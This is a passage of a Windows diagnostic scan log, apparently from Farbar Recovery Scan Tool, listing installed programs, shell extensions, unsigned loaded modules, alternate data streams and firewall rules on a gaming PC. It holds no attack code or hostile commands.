NVIDIA HD Audio Driver 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
NVIDIA USBC Driver 1.46.831.832 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Version: 1.46.831.832 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{84AD2AF7-10C8-0395-66F9-FFAEB4C5DBF1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
ONN. (HKLM-x32\...\ONN.) (Version: 1.0.0.5.05 - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version:  - Blizzard Entertainment)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: 1.6.0 - PCSX2 Team)
r2modman 3.1.25 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ac231ef6-6414-5f8d-b36f-3b57705721dd) (Version: 3.1.25 - ebkr)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version:  - Riot Games, Inc.)
Roblox Player for Miggy (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\roblox-player) (Version:  - Roblox Corporation)
Spotify (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Spotify) (Version: 1.1.90.859.gf1bb1e36 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs Desktop 1.6.4 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 1.6.4 - General Workings, Inc.)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 112.3 - Ubisoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{F339C545-24DC-4870-AA32-6EB6B0500B95}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
UXP WebView Support (HKLM-x32\...\UXPW_1_1_0) (Version: 1.1.0 - Adobe Inc.)
VALORANT (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Riot Game valorant.live) (Version:  - Riot Games, Inc)
Vortex (HKLM\...\57979c68-f490-55b8-8fed-8b017a5af2fe) (Version: 1.5.13 - Black Tree Gaming Ltd.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22925 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{77ACFAF7-E5AB-410D-BA14-BBEBF89422DE}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ZoomUMX) (Version: 5.10.4 (5035) - Zoom Video Communications, Inc.)
 
Packages:
=========
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc [2022-04-20] (Adobe Systems Incorporated)
BreeZip -> C:\Program Files\WindowsApps\3138AweZip.AweZip_1.4.16.0_x86__ffd303wmbhcjt [2022-07-28] (BreeZip)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7180.0_x64__8wekyb3d8bbwe [2022-07-28] (Microsoft Studios) [MS Ad]
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.21.0_x64__8wekyb3d8bbwe [2022-07-25] (Microsoft Studios)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-04-26] (NVIDIA Corp.)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-01-07] (Microsoft Corporation)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj [2020-07-31] (Realtek Semiconductor Corp)
Visage -> C:\Program Files\WindowsApps\SadSquareStudio.Visage_1.1.0.0_x64__855q6fdw1qbrg [2022-06-22] (SadSquare Studio)
WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2226.5.0_x64__cv1g1gvanyjgm [2022-07-28] (WhatsApp Inc.)
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.14326.21062.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-317A81924068} -> [Creative Cloud Files] => C:\Users\Miggy\Creative Cloud Files [2020-08-04 16:40]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{9E121B07-D732-48C1-94D0-77C233EAE0F3} -> [MEGAsync] => C:\Users\Miggy\Documents\MEGAsync [2022-06-05 15:01]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Miggy\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => No File
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [   AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-07-23] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\nvshext.dll [2022-04-21] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
 
==================== Shortcuts & WMI ========================
 
==================== Loaded Modules (Whitelisted) =============
 
2022-07-12 17:36 - 2021-11-11 04:03 - 001495552 _____ () [File not signed] C:\Program Files (x86)\ONN\DuiLib.dll
2022-07-12 17:36 - 2018-09-06 03:45 - 000045056 _____ () [File not signed] C:\Program Files (x86)\ONN\HookDLL.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000015360 _____ () [File not signed] C:\Program Files (x86)\Origin\libEGL.DLL
2022-07-05 18:54 - 2022-07-05 18:54 - 003090944 _____ () [File not signed] C:\Program Files (x86)\Origin\libGLESv2.dll
2022-07-12 17:36 - 2019-07-18 06:35 - 000049152 _____ (0) [File not signed] C:\Program Files (x86)\ONN\CommFunc.dll
2022-07-12 17:36 - 2019-08-17 03:25 - 000119296 _____ (0) [File not signed] C:\Program Files (x86)\ONN\DrvInDll.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000002560 _____ (The ICU Project) [File not signed] C:\Program Files (x86)\Origin\icudt58.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001252864 _____ (The ICU Project) [File not signed] C:\Program Files (x86)\Origin\icuuc58.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000030208 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qgif.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000032768 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qico.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000256512 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000026112 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qtga.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000305152 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000025600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000709120 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Multimedia.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001179136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000207360 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Positioning.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000310272 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5PrintSupport.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 003513344 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Qml.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 003390976 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Quick.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000068096 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5QuickWidgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000045568 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5TextToSpeech.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000116224 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebChannel.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 054071296 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebEngineCore.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000211456 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebEngineWidgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000146432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 000046592 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 006270976 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 001389568 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 000157184 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll
2022-07-28 12:59 - 2022-07-28 12:59 - 000210432 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll
2021-09-14 00:46 - 2022-07-23 18:23 - 005979824 _____ (The Qt Company Oy -> The Qt Company Ltd.) [File not signed] C:\Users\Miggy\AppData\Local\MEGAsync\Qt5Core.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log:AAE9D2281E [4298]
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log_backup1:E79F04DA79 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log:5ACBC90093 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1:A416BDA264 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298]
AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [4298]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490]
 
==================== Safe Mode (Whitelisted) ==================
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer (Whitelisted) ==========
 
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2018-04-11 16:38 - 2018-04-11 16:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Miggy\Downloads\FXHeNR8WYAAmLXM.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [TCP Query User{75F1F7B6-893C-4C9A-8BEB-1A01FE14D19B}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{C570E9D4-54C7-4C8E-BFE2-33790B0CDEE4}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{512DD18C-E03C-4F68-ADDB-C1B6C668DE92}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{BDFC16B9-6362-4C4F-B63A-563BB28D6D95}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{D375EA9F-C466-429B-9310-86A9AF754CE7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{1111D7E9-0263-4BEA-AE48-5814F94C25AE}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{E129FC62-A6F4-43F0-A596-705A65A6ECBE}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{8B14CB93-57E1-4205-86E0-9D64AD5CD2C2}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [{E4D8E207-53E2-4BCA-857B-95C442C4A003}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{8E1288D1-FF8B-43CF-B774-BAF7368A878E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{07AEC99C-D78B-40D8-81B3-B6A57F65D5B2}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E69E5D28-B7DD-46AB-BEAB-C839E5454B7D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B37C3BEA-90A8-4571-B32B-A3D32D66E996}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{01812E29-A7AD-4EE9-8996-E4D05D2A9287}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{630E1402-F874-4FED-87A1-27FF1098A671}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{442AD7B1-9864-41C2-987F-C9207D6685D1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{04B6391E-7D83-45FF-A254-ED38AB86EED9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [TCP Query User{D31632D6-BD4D-4CF9-BDBA-615A660D8175}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [UDP Query User{D69435F2-BA58-463D-B859-6BEF8812CA30}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [{EC5AA6B0-DC8D-4280-B23B-A4BFF1925284}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{FFBFCEFF-753E-47D9-A86B-A9B045A20B5E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{E265D979-F29E-4142-AD18-6FE8ACA0E024}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe (Bethesda Softworks) [File not signed]
FirewallRules: [{4BCC34F1-1289-481C-AF43-C75646E09D08}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe (Bethesda Softworks) [File not signed]
FirewallRules: [{CDBE68AB-7DCB-46F1-9F35-6F893AD3884D}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\103.0.1264.71\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{74D3033E-C185-4B6B-A5E4-69A9816ED816}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{F1B8821F-0E16-4528-B1BB-79C8017CBFDF}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{490A1CA8-F6A2-460A-A5B0-E670FA556A14}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MultiVersus\start_protected_game.exe (EasyAntiCheat Oy -> Epic Games, Inc.)
FirewallRules: [{35EEA0A0-6565-4591-AABF-1C31911C42CE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MultiVersus\start_protected_game.exe (EasyAntiCheat Oy -> Epic Games, Inc.)
FirewallRules: [{53C48A63-A19E-49EF-9F5D-8566D06C5B5D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{4F014064-D571-4011-B69C-D305F76DE335}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{62F86B99-E850-4A82-B6D8-94A1F14EEDCA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{B7FE4BFB-2CE5-4A4B-8A1C-5BB196B30BEE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{A720A792-6D7C-4D3A-A43B-C2569E3AC5DE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
